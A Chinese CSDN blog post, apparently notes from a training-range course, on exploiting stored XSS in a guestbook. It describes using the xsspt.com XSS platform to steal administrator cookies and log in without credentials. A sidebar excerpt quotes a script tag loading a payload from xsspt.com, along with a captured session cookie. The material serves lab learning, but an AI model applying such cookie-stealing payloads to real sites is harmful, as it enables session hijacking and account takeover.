掌控安全第四课xss利用

最新推荐文章于 2021-09-28 15:41:01 发布
最新推荐文章于 2021-09-28 15:41:01 发布
阅读量1.2k 收藏 4
点赞数 1
分类专栏: 白帽学习 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haodawei123/article/details/85867156
版权

xss漏洞利用原理

存在xss漏洞的留言板,提交留言的内容为js代码,xss漏洞会直接执行,可以利用这个漏洞还将登录到留言页面的所有的主机的信息打到一个指定的位置,可以自己架设一个平台或者,打到xss平台,然后利用打到的cookie信息登录到管理页面不用输入管理员账号密码

Xss平台可以接受打到的cookie等信息

http://xsspt.com/index.php?do=project&act=view&id=42583

靶场网址

http://117.41.229.122:8004/Feedback.asp
在这里插入图片描述
提交留言的内容为js代码,xss漏洞会直接执行

xss平台搭建

利用上面的xss网址注册一个账号并配置如下
因为XSS Payload的强大,也是为了使用的方便,有安全研究者将许多功能封装了起来做成了XSS平台。也是因为插入点一般都有长度限制,所以说xss一般攻击都需要外链。我在这里演示用的是网上的xss平台:http://xsspt.com,需要自己去注册和登录,反正账号密码知道就行了,邮箱反正不验证不建议写真实的。
我们先建立项目,名称什么乱选都行,就是选择模块的时候记得选取这两个
在这里插入图片描述然后你可以看到一叠代码,这个就是两个模块中的XSS Payload,现在你们能够理解为什么要XSS平台了吧,我们用滚轮拖到最下面
在这里插入图片描述随便选择其中的一个js代码,填写到留言板提交,只要等管理员登录就行了。
在这里插入图片描述

haodawei123
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
XSS测试平台使用
Fly_鹏程万里
08-07 2050
这里推荐一个常用的XSS平台:xsspt.com,下面是该平台的使用教程~ XSSPT使用方法: 注册 如果没有账户,可以通过“注册”来注册一个账户: 登录 使用注册的账户登录进行登录认证,之后即可进入主页面 功能界面介绍 a、主界面 B、辅助选项 C、学习 该模块披露了一些已经修复的漏洞,有助于自我学习与实践 D、友情链接与历史 友情链接可以帮助你...
掌控安全学院SQL注入靶场
qaq517384的博客
11-18 3649
总体没啥难度,也没有啥过滤,拿来复健感觉还不错,最后一个宽字节注入又花了点时间研究了一下
xsspt网址
stc的博客
02-13 3293
https://xsspt.com https://xss.pt/xss.php http://xssye.com
sql显错注入——靶场操作记录<掌控安全
chick11的博客
09-28 2508
掌控安全学院SQL注入靶场 存在index.php? 前几节课讲过?一般为get传参! 当然界面上也说了 ————————————————开始尝试—————————————— 1.判断是否存在注入 当输入id=2时页面发生变化 再继续掌控安全学院SQL注入靶场 当加上条件and1=2时界面不显示(报错)基本确定存在注入 ————————————————判断字段数——————————————掌控安全学院SQL注入靶场输入order by 4 之后原本显示正常的界面显示不正常! 判断当前表中字段.
掌控安全的靶场第三章
小白渣的博客
12-09 1371
cookie 伪造目标权限 打开传送门,可以看到这样的页面 按照题目提示是一个存储型的xss,于是我们在能留言的地方都输入看看有没有弹窗, 成功弹窗了 因为XSS Payload的强大,也是为了使用的方便,有安全研究者将许多功能封装了起来做成了XSS平台。也是因为插入点一般都有长度限制,所以说xss一般攻击都需要外链。我在这里演示用的是网上的xss平台:http://xsspt.com,随便...
第十四节 IE中利用CSS触发XSS-01
最新发布
09-15
"IE中利用CSS触发XSS-01" 在IE浏览器中,CSS可以用来触发XSS攻击。本节课程将介绍如何使用CSS来触发XSS。 CSS介绍 CSS(Cascading Style Sheets)是一种用来表现HTML或XML文件样式的计算机语言。CSS不仅可以静态...
Web安全性测试之XSS
01-31
XSS 全称(CrossSiteScripting)跨站脚本攻击,是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.比如获取用户的...
利用Express模拟web安全之---xss的攻与防
01-26
攻击者利用XSS漏洞向网页中插入恶意的JavaScript代码,当用户访问这些被篡改的页面时,恶意脚本会执行,从而对用户的安全造成威胁。XSS攻击的危害广泛,包括盗取用户账号、控制企业数据、盗窃敏感信息、强制发送邮件...
Web-安全渗透全套教程XSS跨.zip
05-22
XSS(Cross-Site Scripting,跨站脚本攻击)是其中一种常见的安全漏洞,它允许攻击者通过在网页上注入恶意脚本,进而对用户浏览器进行操控。本套教程聚焦于XSS攻击的原理、检测和防御策略,旨在帮助学习者深入理解这...
Web安全测试之XSS实例讲解
09-01
Web安全测试中的XSS(Cross Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在受害者的浏览器中注入并执行恶意脚本。攻击者通常利用这种漏洞来窃取用户的敏感信息,如Cookie,甚至操纵用户的浏览器行为,将...
渗透练习-XVWA渗透测试靶场
01-26
Xtreme Vulnerable Web Application (XVWA)是一款使用PHP/MySQL编写的靶场,可以帮助初学者快速学习安全姿势巩固渗透测试知识。建议将这个靶场部署在本地服务器来提升你的能力。 指令:XVWA采用一站式安装,你可以在windows, linux 或 Mac平台下进行设置,为了能正常使用XVMA你需要按以下几个步骤配置Apache-PHP-MYSQL环境,这里我们使用的是XAMP,你也可以自己选择喜欢的集成包。 将xvwa文件复制到你的web目录,确保目录名依旧为xvwa。 配合kali效果更佳
获取目标服务器c盘下flag文件信息,公开课基础演练靶场 第六章 webshell控制目标详细解题思路...
weixin_42442653的博客
08-06 1078
我看见第六章的传送门上写着大大的两个字--提权!!在上一章中,我已经通过上传一句话马,用菜刀连接了上传的这个文件,从而得到了后台的部分权限。但是我试过,现在拥有的权限,还不能打开c盘中的文件。而C盘中的文件往往都是比较重要的,因此,我需要提升自己的权限,如下图。进入传送门后,发现这一章的网站仍然是之前看到过的那个。而这个网站的管理员cookie已经被我拿到,并且已经成功上传一句话马至服务器了,如下...
web安全XSS测试平台使用教程
平平无奇
08-12 2万+
我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 一、注册用户并登录 二、创建项目 1.创建项目,创建完后会生成一个xss可用脚本地址 项目名...
[5] 前端渗透测试
Debroon
07-03 4149
我很开心,到这,您应该是看完了, 《Web通信原理》 《Web前后端基础》 《信息收集》 《SQL注入》 我不知道您是否看懂了,有错别字或语句不通的地方还请 call 我(23609099-Q)。 因为我还是会继续写下去,我学习安全喜欢边学边写。 ...
掌控安全靶场第二章:遇到阻难!绕过WAF过滤!
k1k5cn的博客
11-10 2496
最近在学习CTF,前不久发现一个还不错的靶场 封神台 - 掌控安全在线演练靶场 二话不说,开干吧 第二章:遇到阻难!绕过WAF过滤! 一、测试是否有注入点 附上链接 https://hack.zkaq.cn/battle/target?id=31ac789a52edf9bb 标题上写了是【配套课时:SQL注入攻击原理 实战演练】SQL注入, 随便点击一个新闻。在id=171后面加一个引号’,测试一下是否有SQL注入。 有弹框了,提示过滤了很多关键字。下一步考虑如何绕过这些关键字。 二、绕过WAF关键字过滤
【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
【封神台 - 掌控安全靶场】尤里的复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
XSS测试代码
Tianyi_liang的博客
03-13 1158
XSS测试代码收集
掌控安全第二关记录
haodawei123的博客
01-04 3254
掌控安全第二关记录网址寻找注入点亮点1、使用cookie传参进行注入测试这里的“+”很关键 网址 第二关网址:http://117.41.229.122:8004/ 寻找注入点 点击其中的一个新闻得到网址http://117.41.229.122:8004/shownews.asp?id=171 http://117.41.229.122:8004/shownews.asp?id=171 ord...
百度内部通用XSS攻击解决方案探讨培训ppt
03-20
百度内部通用XSS攻击解决方案探讨培训ppt 随着互联网的快速发展和普及,网络安全问题日益突出。由于网站和应用程序的...相信通过这样的培训,企业能够更好地应对XSS攻击等网络安全威胁,保护用户的隐私和数据安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值